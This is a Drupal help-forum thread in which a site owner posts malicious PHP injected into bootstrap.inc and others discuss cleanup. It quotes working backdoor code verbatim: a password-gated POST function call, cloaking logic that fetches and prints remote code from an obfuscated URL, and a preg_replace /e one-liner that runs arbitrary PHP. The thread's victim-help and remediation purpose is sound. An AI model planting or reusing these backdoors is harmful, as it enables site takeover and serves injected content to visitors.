# includes/bootstrap.inc hacked/changed constantly

Tags: drupal, drupal-7

My hosting provider warned me that my bootstrap.inc file is connecting to an infected host. The issue is meant to be happening between 771 and 808 line of includes/bootstrap.inc file (code below).

This file is somehow changed constantly (once a week), from 120kb to 123kbs. Wherever this happens, I try to upload a clean file. If the file is changed/hacked, my hosting response is longer by 10-15 seconds.

The drupal 7 is updated to 7.41, the modules are up to date.
The code that's causing the issue, is somewhere between those lines (I suspect its the "cookie" part). This is the infected/added part my hosting provider warned me about:

```
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'],   @$p['c'], '');

if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);

$bad_url = false;
foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
    $bad_url = true;
    break;
}
}

$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
 //    setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
 //        $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
//    if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
    $echo_done = true;
    print $decoded;
}
}//iend
```

I'm no back-end developer and I've been using bootstrap for hobby related-project for over 8 years.

I tried to clean D7 (reuploaded fresh includes, modules and everything apart from /sites/). Tried to check this on some popular scanners.

Does anyone have any idea, how to block this changes to bootstrap.inc? Are there any successful tools for that, or modules for scanning? Or maybe someone recognizes the exploit and could give me a tip where its coming from?

Thank you in advance.

Comment: Short update on this; thanks to a very kind person on D7 forums I've got an assumption its a malware-exploit mentioned here:  http://labs.sucuri.net/notes/2015-12-28 - haven't solved it tho.

Answer (score 2):

I had the same hack on my Drupal site. The code they put in the bootstrap.inc file looked almost identical to yours.

Apart of the changes to the bootstrap.inc the hackers installed multiple backdoors in various modules. I was able to find the backdoors using the [Hacked](https://www.drupal.org/project/hacked) module, which allows you to find modified files.

The backdoors in my Drupal looked similar to this code:

```
<?php @preg_replace('/(.*)/e', @$_POST['ttqdgkkfkolmt'], '');
```

This code uses a vulnerability in preg_replace, which allows the attackers to execute random PHP code using a simple HTTP post request. (The preg_replace vulnerably is resolved in PHP version > 5.5)

Hope this helped. Good luck finding the backdoors!

Comment: Thanks for your input. I tried hacked module before but with no good results. Instead, I've recently removed all the old-unused themes from drupal installation and it seems its fine since several days. But I'm thinking lately on changing the CMS on something with auto-updates and better security modules.